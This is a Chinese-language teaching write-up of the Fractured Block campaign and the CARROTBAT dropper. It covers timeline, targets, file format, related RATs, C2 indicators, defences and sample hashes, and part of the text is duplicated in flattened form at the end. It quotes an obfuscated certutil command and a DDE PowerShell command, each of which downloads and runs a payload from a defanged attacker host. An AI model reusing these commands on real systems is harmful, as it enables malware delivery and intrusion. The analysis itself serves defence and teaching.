Fractured Block攻击活动与CARROTBAT恶意软件分析教学文档

1. 攻击活动概述

Fractured Block是一个针对东南亚地区（特别是韩国与朝鲜）的网络攻击活动，主要使用CARROTBAT恶意软件作为传播工具。

1.1 关键时间线

首次发现：2017年12月（针对英国政府机构）
活跃期：2018年3月至2018年9月（29个样本编译时间）
最新活动：截至2018年11月仍在持续

1.2 攻击目标

主要地区：韩国、朝鲜、英国、美国、加拿大
目标行业：政府机构、加密货币交易所

2. CARROTBAT恶意软件分析

2.1 基本功能

CARROTBAT是一个恶意代码传播软件，主要功能包括：

嵌入并展示诱饵文件
下载并执行远程payload
支持11种文件格式的诱饵文档

2.2 技术特点

2.2.1 文件结构

最后8个字节包含两个DWORD：
- 诱饵文档长度
- 文件类型标识
剩余部分为完整的诱饵文档内容

2.2.2 文件类型标识对应表

值	文件扩展名
0	.doc
1	.docx
2	.eml
3	.hwp
4	.jpg
5	.pdf
6	.png
7	.ppt
8	.pptx
9	.xls
10	.xlsx

2.2.3 执行流程

读取自身最后8个字节获取诱饵信息
提取诱饵文档并写入磁盘
在新进程中打开诱饵文档
执行混淆命令下载payload

2.3 典型执行命令

C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f https://881.000webhostapp[.]com/1.txt && ren 1.txt 1.bat && 1.bat && exit

3. 攻击手法分析

3.1 初始入侵方式

钓鱼邮件：伪装成政治或金融主题
漏洞利用：使用DDE漏洞执行恶意代码

示例攻击：

主题："美国会在没有准备的情况下与朝鲜方面对话"

利用代码：

c:\windows\system32\cmd.exe "/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc', '%TEMP%\\AAA.exe');Start-Process('%TEMP%\\AAA.exe')

3.2 诱饵主题

加密货币相关（如COINVIL交易所）
政治事件（美朝关系、特朗普访问新加坡峰会）

4. 关联恶意软件家族

4.1 SYSCON

类型：简单远程访问木马(RAT)
通信方式：FTP
C2服务器示例：
- ftp.bytehost31[.]org
- ftp.byethost7[.]com
- ftp.byethost10[.]com

4.2 OceanSalt

特点：
- 使用外部的winnet.ini存储C2信息
- 信息使用XOR密钥编码
- 典型C2：61.14.210[.]72:7117

解码函数示例（Python）：

def decode(data):
    out = ""
    c = 0
    for d in data:
        out += chr(ord(d)^c)
        c+=1
    return out

4.3 KONNI

类型：功能丰富的RAT
活跃时间：4年以上
目标地区：东南亚

5. 基础设施分析

5.1 下载服务器

https://881.000webhostapp[.]com/1.txt
http://attach10132.1apps[.]com/1.txt
https://071790.000webhostapp[.]com/1.txt
https://vnik.000webhostapp[.]com/1.txt

5.2 C2服务器

FTP服务器：
- ftp.byethost7[.]com
- ftp.byethost10[.]com
- files.000webhost[.]com
OceanSalt C2：
- 61.14.210[.]72:7117

6. 防御措施

6.1 检测方法

AutoFocus标签：
- FracturedBlock
- SYSCON
- KONNI
- CARROTBAT
WildFire：检测相关恶意文件

6.2 防护建议

监控certutil工具的异常使用
检查TEMP目录下的可疑.bat文件
拦截与已知恶意域名的通信
对Office文档启用DDE保护

附录：样本哈希值

CARROTBAT样本

d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d
8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa
26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847
...

SYSCON样本

5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b
fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659
...

OceanSalt样本

59b023b30d8a76c5984fe62d2e751875b8b3ebe2d520891458cb66a4e9c40005
7cf37067f08b0b8f9c58a35d409fdd6481337bdc2d5f2152f8e8f304f8a472b6
...

Fractured Block攻击活动与CARROTBAT恶意软件分析教学文档 1. 攻击活动概述 Fractured Block是一个针对东南亚地区（特别是韩国与朝鲜）的网络攻击活动，主要使用CARROTBAT恶意软件作为传播工具。 1.1 关键时间线首次发现：2017年12月（针对英国政府机构）活跃期：2018年3月至2018年9月（29个样本编译时间）最新活动：截至2018年11月仍在持续 1.2 攻击目标主要地区：韩国、朝鲜、英国、美国、加拿大目标行业：政府机构、加密货币交易所 2. CARROTBAT恶意软件分析 2.1 基本功能 CARROTBAT是一个恶意代码传播软件，主要功能包括：嵌入并展示诱饵文件下载并执行远程payload 支持11种文件格式的诱饵文档 2.2 技术特点 2.2.1 文件结构最后8个字节包含两个DWORD：诱饵文档长度文件类型标识剩余部分为完整的诱饵文档内容 2.2.2 文件类型标识对应表 | 值 | 文件扩展名 | |----|------------| | 0 | .doc | | 1 | .docx | | 2 | .eml | | 3 | .hwp | | 4 | .jpg | | 5 | .pdf | | 6 | .png | | 7 | .ppt | | 8 | .pptx | | 9 | .xls | | 10 | .xlsx | 2.2.3 执行流程读取自身最后8个字节获取诱饵信息提取诱饵文档并写入磁盘在新进程中打开诱饵文档执行混淆命令下载payload 2.3 典型执行命令 3. 攻击手法分析 3.1 初始入侵方式钓鱼邮件：伪装成政治或金融主题漏洞利用：使用DDE漏洞执行恶意代码示例攻击：主题："美国会在没有准备的情况下与朝鲜方面对话" 利用代码： 3.2 诱饵主题加密货币相关（如COINVIL交易所）政治事件（美朝关系、特朗普访问新加坡峰会） 4. 关联恶意软件家族 4.1 SYSCON 类型：简单远程访问木马(RAT) 通信方式：FTP C2服务器示例： ftp.bytehost31[ . ]org ftp.byethost7[ . ]com ftp.byethost10[ . ]com 4.2 OceanSalt 特点：使用外部的winnet.ini存储C2信息信息使用XOR密钥编码典型C2：61.14.210[ . ]72:7117 解码函数示例（Python）： 4.3 KONNI 类型：功能丰富的RAT 活跃时间：4年以上目标地区：东南亚 5. 基础设施分析 5.1 下载服务器 https://881.000webhostapp[ . ]com/1.txt http://attach10132.1apps[ . ]com/1.txt https://071790.000webhostapp[ . ]com/1.txt https://vnik.000webhostapp[ . ]com/1.txt 5.2 C2服务器 FTP服务器： ftp.byethost7[ . ]com ftp.byethost10[ . ]com files.000webhost[ . ]com OceanSalt C2： 61.14.210[ . ]72:7117 6. 防御措施 6.1 检测方法 AutoFocus标签： FracturedBlock SYSCON KONNI CARROTBAT WildFire ：检测相关恶意文件 6.2 防护建议监控certutil工具的异常使用检查TEMP目录下的可疑.bat文件拦截与已知恶意域名的通信对Office文档启用DDE保护附录：样本哈希值 CARROTBAT样本 SYSCON样本 OceanSalt样本